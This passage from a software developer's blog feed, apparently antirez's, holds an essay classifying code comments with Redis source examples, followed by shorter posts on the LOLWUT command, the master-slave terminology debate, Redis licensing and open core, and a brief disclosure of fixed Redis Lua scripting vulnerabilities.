lua_gettable(lua,-2); /* Stack: array, table, table.sort */
lua_pushvalue(lua,-3); /* Stack: array, table, table.sort, array */
if (lua_pcall(lua,1,0,0)) {
/* Stack: array, table, error */

/* We are not interested in the error, we assume that the problem is
* that there are 'false' elements inside the array, so we try
* again with a slower function but able to handle this case, that
* is: table.sort(table, __redis__compare_helper) */
lua_pop(lua,1); /* Stack: array, table */
lua_pushstring(lua,"sort"); /* Stack: array, table, sort */
lua_gettable(lua,-2); /* Stack: array, table, table.sort */
lua_pushvalue(lua,-3); /* Stack: array, table, table.sort, array */
lua_getglobal(lua,"__redis__compare_helper");
/* Stack: array, table, table.sort, array, __redis__compare_helper */
lua_call(lua,2,0);
}

Lua uses a stack based API. A reader following each call in the function above, having also a Lua API reference at hand, will be able to mentally reconstruct the stack layout at every given moment. But why to force the reader to do such effort? While writing the code, the original author had to do that mental effort anyway. What I did there was just to annotate every line with the current stack layout after every call. Reading this code is now trivial, regardless of the fact the Lua API is otherwise non trivial to follow.

My goal here is not just to offer my point of view on the usefulness of comments as a tool to provide a background that is not clearly available reading a local section of the source code. But also to also provide some evidence about the usefulness of the kind of comments that are historically considered useless or even dangerous, that is, comments stating *what* the code is doing, and not why.

# Classification of comments

The way I started this work was by reading random parts of the Redis source code, to check if and why comments were useful in different contexts. What quickly emerged was that comments are useful for very different reasons, since they tend to be very different in function, writing style, length and update frequency. I eventually turned the work into a classification task.

During my research I identified nine types of comments:

* Function comments
* Design comments
* Why comments
* Teacher comments
* Checklist comments
* Guide comments
* Trivial comments
* Debt comments
* Backup comments

The first six are, in my opinion, mostly very positive forms of commenting, while the final three are somewhat questionable. In the next sections each type will be analyzed with examples from the Redis source code.

FUNCTION COMMENTS

The goal of a function comment is to prevent the reader from reading code in the first place. Instead, after reading the comment, it should be possible to consider some code as a black box that should obey certain rules. Normally function comments are at the top of functions definitions, but they may be at other places, documenting classes, macros, or other functionally isolated blocks of code that define some interface.

rax.c:

/* Seek the grestest key in the subtree at the current node. Return 0 on
* out of memory, otherwise 1. This is an helper function for different
* iteration functions below. */
int raxSeekGreatest(raxIterator *it) {
...

Function comments are actually a form of in-line API documentation. If the function comment is written well enough, the user should be able most of the times to jump back to what she was reading (reading the code calling such API) without having to read the implementation of a function, a class, a macro, or whatever.

Among all the kinds of comments, these are the ones most widely accepted by the programming community at large as needed. The only point to analyze is if it is a good idea to place comments that are largely API reference documentation inside the code itself. For me the answer is simple: I want the API documentation to exactly match the code. As the code is changed, the documentation should be changed. For this reason, by using function comments as a prologue of functions or other elements, we make the API documentation close to the code, accomplishing three results:

* As the code is changed, the documentation can be easily changed at the same time, without the risk of making the API reference stale.

* This approach maximizes the probability that the author of the change, that should be the one better understanding the change, will also be the author of the API documentation change.

* Reading the code is handy to find the documentation of functions or methods directly where they are defined, so that the reader of the code can focus solely on the code, instead of context switching between code and documentation.

DESIGN COMMENTS

While a "function comment" is usually located at the start of a function, a design comment is more often located at the start of a file. The design comment basically states how and why a given piece of code uses certain algorithms, techniques, tricks, and implementation. It is an higher level overview of what you'll see implemented in the code. With such background, reading the code will be simpler. Moreover I tend to trust more code where I can find design notes. At least I know that some kind of explicit design phase happened, at some point, during the development process.

In my experience design comments are also very useful in order to state, in case the solution proposed by the implementation looks a bit too trivial, what were the competing solutions and why a very simple solution was considered to be enough for the case at hand. If the design is correct, the reader will convince herself that the solution is appropriate and that such simplicity comes from a process, not from being lazy or only knowing how to code basic things.

bio.c:
* DESIGN
* ------
*
* The design is trivial, we have a structure representing a job to perform
* and a different thread and job queue for every job type.
* Every thread waits for new jobs in its queue, and process every job
* sequentially.
...

WHY COMMENTS

Why comments explain the reason why the code is doing something, even if what the code is doing is crystal clear. See the following example from the Redis replication code.

replication.c:

if (idle > server.repl_backlog_time_limit) {
/* When we free the backlog, we always use a new
* replication ID and clear the ID2. This is needed
* because when there is no backlog, the master_repl_offset
* is not updated, but we would still retain our replication
* ID, leading to the following problem:
*
* 1. We are a master instance.
* 2. Our replica is promoted to master. It's repl-id-2 will
* be the same as our repl-id.
* 3. We, yet as master, receive some updates, that will not
* increment the master_repl_offset.
* 4. Later we are turned into a replica, connect to the new
* master that will accept our PSYNC request by second
* replication ID, but there will be data inconsistency
* because we received writes. */
changeReplicationId();
clearReplicationId2();
freeReplicationBacklog();
serverLog(LL_NOTICE,
"Replication backlog freed after %d seconds "
"without connected replicas.",
(int) server.repl_backlog_time_limit);
}

If I check just the function calls there is very little to wonder: if a timeout is reached, change the main replication ID, clear the secondary ID, and finally free the replication backlog. However what is not exactly clear is why we need to change the replication IDs when freeing the backlog.

Now this is the kind of thing that happens continuously in software once it has reached a given level of complexity. Regardless of the code involved, the replication protocol has some level of complexity itself, so we need to do certain things in order to make sure that other bad things can't happen. Probably these kind of comments are, in some way, opportunities to reason about the system and check if it should be improved, so that such complexity is no longer needed, hence also the comment can be removed. However often making something simpler may make something else harder or is simply not viable, or requires future work breaking backward compatibility.

Here is another one.

replication.c:

/* SYNC can't be issued when the server has pending data to send to
* the client about already issued commands. We need a fresh reply
* buffer registering the differences between the BGSAVE and the current
* dataset, so that we can copy to other replicas if needed. */
if (clientHasPendingReplies(c)) {
addReplyError(c,"SYNC and PSYNC are invalid with pending output");
return;
}

If you run SYNC while there is still pending output (from a past command) to send to the client, the command should fail because during the replication handshake the output buffer of the client is used to accumulate changes, and may be later duplicated to serve other replicas connecting while we are already creating the RDB file for the full sync with the first replica. This is the why we do that. What we do is trivial. Pending replies? Emit an error. Why is rather obscure without the comment.

One may think that such comments are needed only when describing complex protocols and interactions, like in the case of replication. Is that the case? Let's change completely file and goals, and we see still such comments everywhere.

expire.c:

for (j = 0; j < dbs_per_call && timelimit_exit == 0; j++) {
int expired;
redisDb *db = server.db+(current_db % server.dbnum);

/* Increment the DB now so we are sure if we run out of time
* in the current DB we'll restart from the next. This allows to
* distribute the time evenly across DBs. */
current_db++;
...

That's an interesting one. We want to expire keys from different DBs, as long as we have some time. However instead of incrementing the “database ID” to process next at the end of the loop processing the current database, we do it differently: we select the current DB in the `db` variable, but then we immediately increment the ID of the next database to process (at the next call of this function). This way if the function terminates because too much effort was spent in a single call, we don't have the problem of restarting again from the same database, letting logically expired keys accumulating in the other databases since we are too focused in processing the same database again and again.

With such comment we both explain why we increment at that stage, and that the next person going to modify the code, should preserve such quality. Note that without the comment the code looks completely harmless. Select, increment, go to do some work. There is no evident reason for not relocating the increment at the end of the loop where it could look more natural.

Trivia: the loop increment was indeed at the end in the original code. It was moved there during a fix: at the same time the comment was added. So let's say this is kinda of a "regression comment".

TEACHER COMMENTS

Teacher comments don't try to explain the code itself or certain side effects we should be aware of. They teach instead the *domain* (for example math, computer graphics, networking, statistics, complex data structures) in which the code is operating, that may be one outside of the reader skills set, or is simply too full of details to recall all them from memory.

The LOLWUT command in version 5 needs to display rotated squares on the screen (http://antirez.com/news/123). In order to do so it uses some basic trigonometry: despite the fact that the math used is simple, many programmers reading the Redis source code may not have any math background, so the comment at the top of the function explains what's going to happen inside the function itself.

lolwut5.c:

/* Draw a square centered at the specified x,y coordinates, with the specified
* rotation angle and size. In order to write a rotated square, we use the
* trivial fact that the parametric equation:
*
* x = sin(k)
* y = cos(k)
*
* Describes a circle for values going from 0 to 2*PI. So basically if we start
* at 45 degrees, that is k = PI/4, with the first point, and then we find
* the other three points incrementing K by PI/2 (90 degrees), we'll have the
* points of the square. In order to rotate the square, we just start with
* k = PI/4 + rotation_angle, and we are done.
*
* Of course the vanilla equations above will describe the square inside a
* circle of radius 1, so in order to draw larger squares we'll have to
* multiply the obtained coordinates, and then translate them. However this
* is much simpler than implementing the abstract concept of 2D shape and then
* performing the rotation/translation transformation, so for LOLWUT it's
* a good approach. */

The comment does not contain anything that is related to the code of the function itself, or its side effects, or the technical details related to the function. The description is only limited to the mathematical concept that is used inside the function in order to reach a given goal.

I think teacher comments are of huge value. They teach something in case the reader is not aware of such concepts, or at least provide a starting point for further investigation. But this in turn means that a teacher comment increases the amount of programmers that can read some code path: writing code that can be read by many programmers is a major goal of mine. There are developers that may not have math skills but are very solid programmers that can contribute some wonderful fix or optimization. And in general code should be read other than being executed, since is written by humans for other humans.

There are cases where teacher comments are almost impossible to avoid in order to write decent code. A good example is the Redis radix tree implementation. Radix trees are articulated data structures. The Redis implementation re-states the whole data structure theory as it implements it, showing the different cases and what the algorithm does to merge or split nodes and so forth. Immediately after each section of comment, we have the code implementing what was written before. After months of not touching the file implementing the radix tree, I was able to open it, fix a bug in a few minutes, and continue doing something else. There is no need to study again how a radix tree works, since the explanation is the same thing as the code itself, all mixed together.

The comments are too long, so I'll just show certain snippets.

rax.c:

/* If the node we stopped at is a compressed node, we need to
* split it before to continue.
*
* Splitting a compressed node have a few possible cases.
* Imagine that the node 'h' we are currently at is a compressed
* node contaning the string "ANNIBALE" (it means that it represents
* nodes A -> N -> N -> I -> B -> A -> L -> E with the only child
* pointer of this node pointing at the 'E' node, because remember that
* we have characters at the edges of the graph, not inside the nodes
* themselves.
*
* In order to show a real case imagine our node to also point to
* another compressed node, that finally points at the node without
* children, representing 'O':
*
* "ANNIBALE" -> "SCO" -> []

... snip ...

* 3a. IF $SPLITPOS == 0:
* Replace the old node with the split node, by copying the auxiliary
* data if any. Fix parent's reference. Free old node eventually
* (we still need its data for the next steps of the algorithm).
*
* 3b. IF $SPLITPOS != 0:
* Trim the compressed node (reallocating it as well) in order to
* contain $splitpos characters. Change chilid pointer in order to link
* to the split node. If new compressed node len is just 1, set
* iscompr to 0 (layout is the same). Fix parent's reference.

... snip ...

if (j == 0) {
/* 3a: Replace the old node with the split node. */
if (h->iskey) {
void *ndata = raxGetData(h);
raxSetData(splitnode,ndata);
}
memcpy(parentlink,&splitnode,sizeof(splitnode));
} else {
/* 3b: Trim the compressed node. */
trimmed->size = j;
memcpy(trimmed->data,h->data,j);
trimmed->iscompr = j > 1 ? 1 : 0;
trimmed->iskey = h->iskey;
trimmed->isnull = h->isnull;
if (h->iskey && !h->isnull) {
void *ndata = raxGetData(h);
raxSetData(trimmed,ndata);
}
raxNode **cp = raxNodeLastChildPtr(trimmed);
...

As you can see the description in the comment is then matched with the same labels in the code. It's hard to show it all in this form so if you want to get the whole idea just check the full file at:

https://github.com/antirez/redis/blob/unstable/src/rax.c

This level of commenting is not needed for everything, but things like radix trees are really full of little details and corner cases. They are hard to recall, and certain details are *specific* to a given implementation. Doing this for a linked list does not make much sense of course. It's a matter of personal sensibility to understand when it's worth it or not.

CHECKLIST COMMENTS

This is a very common and odd one: sometimes because of language limitations, design issues, or simply because of the natural complexity arising in systems, it is not possible to centralize a given concept or interface in one piece, so there are places in the code that tells you to remember to do things in some other place of the code. The general concept is:

/* Warning: if you add a type ID here, make sure to modify the
* function getTypeNameByID() as well. */

In a perfect world this should never be needed, but in practice sometimes there are no escapes from that. For example Redis types could be represented using an "object type" structure, and every object could link to the type the object it belongs, so you could do:

printf("Type is %s\n", myobject->type->name);

But guess what? It's too expensive for us, because a Redis object is represented like this:

typedef struct redisObject {
unsigned type:4;
unsigned encoding:4;
unsigned lru:LRU_BITS; /* LRU time (relative to global lru_clock) or
* LFU data (least significant 8 bits frequency
* and most significant 16 bits access time). */
int refcount;
void *ptr;
} robj;

We use 4 bits instead of 64 to represent the type. This is just to show why sometimes things are not as centralized and natural as they should be. When the situation is like that, sometimes what helps is to use defensive commenting in order to make sure that if a given code section is touched, it reminds you to make sure to also modify other parts of the code. Specifically a checklist comment does one or both of the following things:

* It tells you a set of actions to do when something is modified.

* It warns you about the way certain changes should be operated.

Another example in blocked.c, when a new blocking type is introduced.

blocked.c:

* When implementing a new type of blocking opeation, the implementation
* should modify unblockClient() and replyToBlockedClientTimedOut() in order
* to handle the btype-specific behavior of this two functions.
* If the blocking operation waits for certain keys to change state, the
* clusterRedirectBlockedClientIfNeeded() function should also be updated.

The checklist comment is also useful in a context similar to when certain "why comments" are used: when it is not obvious why some code must be executed at a given place, after or before something. But while the why comment may tell you why a statement is there, the checklist comment used in the same case is more biased towards telling you what rules to follow if you want to modify it (in this case the rule is, follow a given ordering), without breaking the code behavior.

cluster.c:

/* Update our info about served slots.
*
* Note: this MUST happen after we update the master/replica state
* so that CLUSTER_NODE_MASTER flag will be set. */

Checklist comments are very common inside the Linux kernel, where the order of certain operations is extremely important.

GUIDE COMMENT

I abuse guide comments at such a level that probably, the majority of comments in Redis are guide comments. Moreover guide comments are exactly what most people believe to be completely useless comments.

* They don't state what is not clear from the code.

* There are no design hints in guide comments.

Guide comments do a single thing: they babysit the reader, assist him or her while processing what is written in the source code by providing clear division, rhythm, and introducing what you are going to read.

Guide comments’ sole reason to exist is to lower the cognitive load of the programmer reading some code.

rax.c:

/* Call the node callback if any, and replace the node pointer
* if the callback returns true. */
if (it->node_cb && it->node_cb(&it->node))
memcpy(cp,&it->node,sizeof(it->node));

/* For "next" step, stop every time we find a key along the
* way, since the key is lexicographically smaller compared to
* what follows in the sub-children. */
if (it->node->iskey) {
it->data = raxGetData(it->node);

return 1;
}

There is nothing that the comments are adding to the code above. The guide comments above will assist you reading the code, moreover they'll acknowledge you about the fact you are understanding it right. More examples.

networking.c:

/* Log link disconnection with replica */
if ((c->flags & CLIENT_SLAVE) && !(c->flags & CLIENT_MONITOR)) {
serverLog(LL_WARNING,"Connection with replica %s lost.",
replicationGetSlaveName(c));
}

/* Free the query buffer */
sdsfree(c->querybuf);
sdsfree(c->pending_querybuf);
c->querybuf = NULL;

/* Deallocate structures used to block on blocking ops. */
if (c->flags & CLIENT_BLOCKED) unblockClient(c);
dictRelease(c->bpop.keys);

/* UNWATCH all the keys */
unwatchAllKeys(c);
listRelease(c->watched_keys);

/* Unsubscribe from all the pubsub channels */
pubsubUnsubscribeAllChannels(c,0);
pubsubUnsubscribeAllPatterns(c,0);
dictRelease(c->pubsub_channels);
listRelease(c->pubsub_patterns);

/* Free data structures. */
listRelease(c->reply);
freeClientArgv(c);

/* Unlink the client: this will close the socket, remove the I/O
* handlers, and remove references of the client from different
* places where active clients may be referenced. */
unlinkClient(c);

Redis is *literally* ridden of guide comments, so basically every file you open will contain plenty of them. Why bother? Of all the comment types I analyzed so far in this blog post, I'll admit that this is absolutely the most subjective one. I don't value code without such comments as less good, yet I firmly believe that if people regard the Redis code as readable, some part of the reason is because of all the guide comments.

Guide comments have some usefulness other than the stated ones. Since they clearly divide the code in isolated sections, an addition to the code is very likely to be inserted in the appropriate section, instead of ending in some random part. To have related statements nearby is a big readability win.

Also make sure to check the guide comment above before the unlinkClient() function is called. The guide comment briefly tells the reader what the function is going to do, avoiding the need to jump back into the function if you are only interested in the big picture.

TRIVIAL COMMENTS

Guide comments are very subjective tools. You may like them or not. I love them. However, a guide comment can degenerate into a a very bad comment: it can easily turn into a "trivial comment". A trivial comment is a guide comment where the cognitive load of reading the comment is the same or higher than just reading the associated code. The following form of trivial comment is exactly what many books will tell you to avoid.

array_len++; /* Increment the length of our array. */

So if you write guide comments, make sure you avoid writing trivial ones.

DEBT COMMENTS

Debt comments are technical debts statements hard coded inside the source code itself:

t_stream.c:

/* Here we should perform garbage collection in case at this point
* there are too many entries deleted inside the listpack. */
entries -= to_delete;
marked_deleted += to_delete;
if (entries + marked_deleted > 10 && marked_deleted > entries/2) {
/* TODO: perform a garbage collection. */
}

The snippet above is extracted from the Redis streams implementation. Redis streams allow to delete elements from the middle using the XDEL command. This may be useful in different ways, especially in the context of privacy regulations where certain data cannot be retained no matter what data structure or system you are using in order to store them. It is a very odd use case for a mostly append only data structure, but if users start to delete more than 50% of items in the middle, the stream starts to fragment, being composed of "macro nodes". Entries are just flagged as deleted, but are only reclaimed once all the entries in a given macro node are freed. So your mass deletions will change the memory behavior of streams.

Right now, this looks like a non issue, since I don't expect users to delete most history in a stream. However it is possible that in the future we may want to introduce garbage collection: the macro node could be compacted once the ratio between the deleted entries and the existing entries reach a given level. Moreover nearby nodes may be glued together after the garbage collection. I was kind of afraid that later I would no longer remember what were the entry points to do the garbage collection, so I put TODO comments, and even wrote the trigger condition.

This is probably not great. A better idea was instead to write, in the design comment at the top of the file, why we are currently not performing GC. And what are the entry points for GC, if we want to add it later.

FIXME, TODO, XXX, "This is a hack", are all forms of debt comments. They are not great in general, I try to avoid them, but it's not always possible, and sometimes instead of forgetting forever about a problem, I prefer to put a node inside the source code. At least one should periodically grep for such comments, and see if it is possible to put the notes in a better place, or if the problem is no longer relevant or could be fixed right away.

BACKUP COMMENTS

Finally backup comments are the ones where the developer comments older versions of some code block or even a whole function, because she or he is insecure about the change that was operated in the new one. What is puzzling is that this still happens now that we have Git. I guess people have an uneasy feeling about losing that code fragment, considered more sane or stable, in some years old commit.

But source code is not for making backups. If you want to save an older version of a function or code part, your work is not finished and cannot be committed. Either make sure the new function is better than the past one, or take it just in your development tree until you are sure.

Backup comments end my classification. Let's try some conclusion.

# Comments as an analysis tool.

Comments are rubber duck debugging on steroids, except you are not talking with a rubber duck, but with the future reader of the code, which is more intimidating than a rubber duck, and can use Twitter. So in the process you really try to understand if what you are stating *is acceptable*, honorable, good enough. And if it is not, you make your homework, and come up with something more decent.

It is the same process that happens while writing documentation: the writer attempts to provide the gist of what a given piece of code does, what are the guarantees, the side effects. This is often a bug hunting opportunity. It is very easy while describing something to find that it has holes... You can't really describe it all because you are not sure about a given behavior: such behavior is just emerging from complexity, at random. You really don't want that, so you go back and fix it all. I find this a splendid reason to write comments.

# Writing good comments is harder than writing good code

You may think that writing comments is a lesser noble form of work. After all you *can code*! However consider this: code is a set of statement and function calls, or whatever your programming paradigm is. Sometimes such statements do not make much sense, honestly, if the code is not good. Comments require always to have some design process ongoing, and to understand the code you are writing in a deeper sense. On top of that, in order to write good comments, you have to develop your writing skills. The same writing skills will assist you writing emails, documentation, design documents, blog posts, and commit messages.

I write code because I have an urgent sense to share and communicate more than anything else. Comments coadiuvate the code, assist it, describe our efforts, and after all I love writing them as much as I love writing code itself.

(Thanks to Michel Martens for giving feedbacks during the writing of this blog post) Comments]]>
http://antirez.com/news/124
LOLWUT: a piece of art inside a database command http://antirez.com/news/123 http://antirez.com/news/123 Wed, 12 Sep 2018 15:20:28 +0000
As I was changing the Redis source code to get rid of a specific word where possible, I started to think that whatever my idea was about the work I was doing, I’m the kind of person that enjoys writing code that has no measurable technological effects. Replacing words is just annoying, even if, even there, there were a few worthwhile technological challenges. But there is some other kind of code that I believe has a quality called “hack value”. It may not solve any technological problem, yet it’s worth to write. Sometimes because the process of writing the code is, itself, rewarding. Other times because very technically advanced ideas are used to solve a not useful problem. Sometimes code is just written for artistic reasons.

In some way the Twitter discussion of the last days, mostly uninformed, chaotic, heated, made me think that, at this point, we are very far from the first hackers in the 60s. As I get older I find that it is harder and harder to talk about technology with an hacking perspective, where there are no walls or pre-cooked ideas, and the limit is the exploration. For everything you say there is a best practice. For every idea there is a taboo. To this new setup I say LOLWUT, since I don’t feel represented by it, nor it represents hacking, at least in my vision. So the idea was to spend some technologically useless time in order to explore something of the 60s.

My attention went immediately to one of the computer art pieces I love the most: Schotter, by Georg Nees (https://en.wikipedia.org/wiki/Georg_Nees). With the help of a plotter and ALGOL programs, Nees explored writing programs to generate art using caos (randomness) and repeating patterns. Schotter is remarkable because of the simplicity of the piece and the deep meaning that the observer can find looking at it. Under a surface of total calm and order, deep inside the disorder hides. Or, if you put it upside down it becomes like the sea during a tempest. However the surface may look impetuous, the deep sea remains calm.

Is it possible to turn a piece of art into a database command? This was challenging because Redis is mostly used by a command line interface. Nowadays terminals are for sure fancier than the ones of the past, but yet to display decent graphics is hard. On the other side there is the huge advantage of the real time computation: a piece of art can be dynamic, changing every time it is generated.

Before continuing, I want to show you the final result:

img://antirez.com/misc/lolwut1.png

While very low resolution the idea of the original piece is still there. To make this possible I used a trick that recently was used by multiple programs trying to display interesting things in a text console. It involves using the Braille unicode charset in order to create a pixel matrix which is more dense than the individual characters of the console. Specifically, for each character, it is possible to fit a 2x8 grid of pixels.

The second part of the experiment was to make the art piece parametric:

img://antirez.com/misc/lolwut2.png

It is possible to generate different versions of the original piece, changing the number of squares and the output resolution. Finally the source code wanted to be an example of literate programming, being written in a form that resembles more a tutorial describing what everything does and why, instead of some opaque generator. You can find the code here:

https://github.com/antirez/redis/blob/unstable/src/lolwut.c

LOLWUT is also going to be a tradition starting from Redis 5. At each new major version of Redis what the command does will change completely, only a set of rules will be fixed:

1. It can’t do anything technologically useful.
2. It should be fast at doing what it does, so that it is safe to call LOLWUT on production instances.
3. The output should be entertaining in some way.

I wrote the first one for Redis 5, for the next versions, if I find interest, I’ll ask somebody else that contributed to Redis to write the other LOLWUT versions, otherwise I’ll write it again myself (but I hope that’s not the case). LOLWUT should remember ourselves that the work we do, programming, did not start just in order to produce something useful. Initially it was mainly a matter of exploring possibilities. I hope that LOLWUT also will remind the Redis community that computers are about humans, and that it is not possible to reason in an aseptic way just thinking at the technological implications. There are people using systems, people building systems, and so forth. Comments]]>
http://antirez.com/news/123
On Redis master-slave terminology http://antirez.com/news/122 http://antirez.com/news/122 Thu, 06 Sep 2018 21:04:56 +0000
I said that I was sorry he was disappointed about that, but at the same time, I don’t believe that terminology out of context is offensive, so if I use master-slave in the context of databases, and I’m not referring in any way to slavery. I originally copied the terms from MySQL, and now they are the way we call things in Redis, and since I do not believe in this battle (I’ll tell you later why), to change the documentation, deprecate the API and add a new one, change the INFO fields, just to make a subset of people that care about those things more happy, do not make sense to me.

After it was clear that I was not interested in his argument, Mark accused me of being fascist. Now I’m Italian, and incidentally my grand grand father was put in jail for years by fascists because he was communist and was against the regime. He was released to die in a couple of months at home. The father of my mother instead went in the north of Italy for II World War, and was able to escape from the Nazis for a miracle. Stayed 5 years as a refugee, and eventually returned home to become the father of my mother. Mark do not care about the terminology he uses against other people, if the matter at hand is to make sure people that may potentially feel offended will not.

Now, it’s time for you to know my political orientation, so that you can put in context my refuse to change terminology. I want my government to be more open to immigration, including economical immigration, I do not accept any racism and I was strongly in favor of “ius soli” law here in Italy. I do not just accept conceptually same-sex marriage, but I really love the beauty that there is in two men or women kissing, making sex, adopting a child. Every day in Facebook and with my social sphere I actively talk about politics in order to push equality. I believe in a systematic bias that our society perpetuates against women, and I’m proud to live in a country where women are free to not recognize the child as their own after giving birth, in order to have the same rights of the biological father that can go away: this was a big win of the European feminist movement in the 70s, together with the abortion right. I’m proud that in my country there is no death penalty like there is not in the rest of EU, that guns are mostly banned, that there is universal healthcare for free.

I do not believe to be fascist or racist honestly, and I write almost daily about all this things on Facebook with my friends, talk at people on the street, and so forth. For years and years, since I was 16. So, what’s the problem with changing this terminology?

The first problem is that every terminology is offensive in principle, and I don’t want to accept this idea that certain words that are problematic, especially for Americans to make peace with their past, should be banned. For example if I’m terminally ill, the “short living request” terminology may be offensive, it reminds me that I’m going to die, or that my father is going to die. Instead of banning every word out there, we should make the mental effort to do better than the political correctness movement that stops at the surface. So, let’s call it master-slave, and instead make a call for US, where a sizable black population is very poor, to have free healthcare, to have cops that are less biased against non-white people, to stop death penalty. This makes really a difference. For instance Europeans that are a lot less sensible to political correctness, managed to do a much better job on that stuff.

There is more: I believe that political correctness has a puritan root. As such it focuses on formalities, but actually it has a real root of prejudice against others. For instance Mark bullied me because I was not complying with his ideas, showing problems at accepting differences in the way people think. I believe that this environment is making it impossible to have important conversations. For instance nobody at this point want to talk about women in tech and about the systematic bias of women in our society (to the point that recently in Japan it was discovered that women were systematically stopped from entering the best medical schools). People will go away once the discussion starts, because everybody knows that at this point to talk about this matters is a huge PR error, can cost you your job or company. Many, while reading this blog post, are thinking that I’m crazy at writing this stuff, even if they think likewise. Well, I don’t want that the people that did this to the our ability to have conversations will get a free pass to say what to do to others, because conversations is the only way we can make people that yet don't have an open vision to change ideas.

Moreover I don't believe in the right to be offended, because it's a subjective thing. Different groups may feel offended by different things. To save the right of not being offended it becomes basically impossible to say or do anything in the long run. Is this the evolution of our society? A few days ago on Hacker News I discovered I can no longer say "fake news" for instance.

I want a world of equity, opportunities, redistribution of wealth, and open borders. But the way I believe this world can be obtained is not by banning words, nor by stalking people on Twitter so that they comply with your ideology. I’ll continue my local political activity, and I’ll continue to write open source software. I hope that Mark, and the others like Mark, will let me live my life as I decided to do. Comments]]>
http://antirez.com/news/122
Redis is not "open core" http://antirez.com/news/121 http://antirez.com/news/121 Fri, 24 Aug 2018 22:38:52 +0000
The simplification this time does not work if it is in your interest to capture the truth of what is happening here. An open core technology requires two things. One is that the system is modular, and the other is that parts of such system are made proprietary in order to create a product around an otherwise free software. For example providing a single node of a database into the open source, and then having the clustering logic and mechanism implemented in a different non-free layer, is an open core technology. Similarly is open core if I write a relational database with a modular storage system, but the only storage that is able to provide strong guarantees is non free. In an open core business model around an open source system it is *fundamental* that you take something useful out of the free software part.

Now for some time Redis is a modular system. You can use Redis modules in order to write many things, including new distributed systems using the recently introduced cluster message bus API, or new data types that look native. However the reason to make Redis modular was not to remove something useful from the system and put a price tag on it. For instance one of the new data structures in Redis 5, the streams, are part of the core and are released under the BSD license. Streams were implemented when Redis was already a modular system.

Redis modules started from a different observation. As a premise I should say that I’m a very conservative person about software development. I believe that Redis should be focused to address just things that, when operated with in-memory data structures, offer strong advantages over other ways to do the same thing. I don’t want Redis to do much more than it does, or to employ every possible consistency tradeoff. I want Redis to be Redis, that is, this general tool that the developer can use in different ways to solve certain problems.

However at Redis Labs we observed multiple times that it’s a bit a shame that Redis cannot solve certain specific problems. For instance what about if Redis was a serious full text search engine? Also well, developers want so much JSON, what about having an API to talk directly JSON? And given that in-memory graphs if represented wisely can be so fast, what about having graph database abilities, with a rich query language? Redis Labs customers often asked directly for such things. And actually, such features could be cool, but it’s not Redis, I’m not interested, and the open source side of Redis does not have the development force to keep all this things going btw. And this is a major advantage both for Redis and for Redis Labs: it is relatively cheap to pay just me and a few more OSS development time internally, while allocating the rest of the resources to development of things that are useful for the Redis Labs business, like making sure the Redis enterprise SaaS and products are good. There is anyway a great deal of contributions arriving from the community. And I also keep saying “no” to all this fancy ideas that would keep Redis in other areas… which is also a problem.

Still to have such things similar to Redis but outside the Redis scope, would be cool, because you know, while it’s not Redis mission, people may very well use a fast inverted index with full text search capabilities that you can feed in real time, while it serves a very good amount of queries per core at the same time. This is what Redis Labs is doing, it’s using the same Redis technology and approach to do more than what Redis wanted to do. Not just in the functionality areas, but also in other areas like consistency models. I’m very opinionated about certain things, and I think that, for instance, CRDTs while super cool in certain use cases, where not the right thing for Redis, to retain the same memory footprint, performance, simplicity, even at the cost of having a weaker consistency model. So Redis Labs, together with a top researcher in the area, did it (and this is a proprietary product without any source available). I can see how such feature can be tremendously useful for certain operations, but Redis was not there to solve everything, and Redis Labs did it.

This is not open core. Redis Labs is doing things that you would never see from me: for bandwidth, and because I believe that not all the softwares must eventually become huge.
So I think that calling this model “open core” is misleading, nothing is removed from the Redis table, just new things are explored, while trying to follow the “Redis way” in other areas otherwise not touched by the Redis project. Comments]]>
http://antirez.com/news/121
Redis will remain BSD licensed http://antirez.com/news/120 http://antirez.com/news/120 Wed, 22 Aug 2018 13:45:52 +0000
What is happening instead is that certain Redis modules, developed inside Redis Labs, are now released under the Common Clause (using Apache license as a base license). This means that basically certain enterprise add-ons, instead of being completely closed source as they could be, will be available with a more permissive license.

I think that Redis Labs Common Clause page did not provide a clear and complete information, but software companies often make communication errors, it happens. To me however, it looks more important that while running a system software business in the “cloud era” (LOL) is very challenging using an open source license, yet Redis Labs totally understood and supported the idea that the Redis core is an open source project, in the *most permissive license ever*, that is, BSD, and during the years provided a lot of funding to the project.

The reason why certain modules developed internally at Redis Labs are switching license, is because they are added value that Redis Labs wants to be able to provide only to end users that are willing to compile and install the system themselves, or to the Redis Labs customers using their services. But it’s not ok to give away that value to everybody willing to resell it. An example of such module is RediSearch: it was AGPL and is now going to be Apache + Common Clause.

About myself, I’ll keep writing BSD code for Redis. For Redis modules I’ll develop, such as Disque, I’ll pick AGPL instead, for similar reasons: we live in a “Cloud-poly”, so it’s a good idea to go forward with licenses that will force other SaaS companies to redistribute back their improvements. However this does not apply to Redis itself. Redis at this point is a 10 years collective effort, the base for many other things that we can do together, and this base must be as available as possible, that is, BSD licensed.

We at Redis Labs are sorry for the confusion generated by the Common Clause page, and my colleagues are working to fix the page with better wording. Comments]]>
http://antirez.com/news/120
Redis Lua scripting: several security vulnerabilities fixed http://antirez.com/news/119 http://antirez.com/news/119 Wed, 13 Jun 2018 17:15:05 +0000
Those vulnerabilities are mostly relevant in the specific case of providing managed Redis severs on the cloud, because it is very unlikely that the vulnerabilities discovered can be used without direct access to the Redis server: many Redis users don’t use the cmsgpack or the struct package at all, and who does will very unlikely feed them with untrusted input. However for cloud providers things are different: they have Redis instances, sometimes in multi tenancy setups, exposed to the user that subscribed for the service. She or he can send anything to such Redis instances, triggering the vulnerabilities, corrupting the memory, violating the Redis process, and potentially taking total control of the Redis process.

For instance this simple Python program can crash Redis using one of the cmsgpack vunlerabilities [1].

[1] https://gist.github.com/antirez/82445fcbea6d9b19f97014cc6cc79f8a

However from the point of view of normal Redis users that control what is sent to their instances, the risk is limited to feeding untrusted data to a function like struct.unpack(), after selecting a particularly dangerous decoding format “bc0” in the format argument.

# Coordinating the advisory

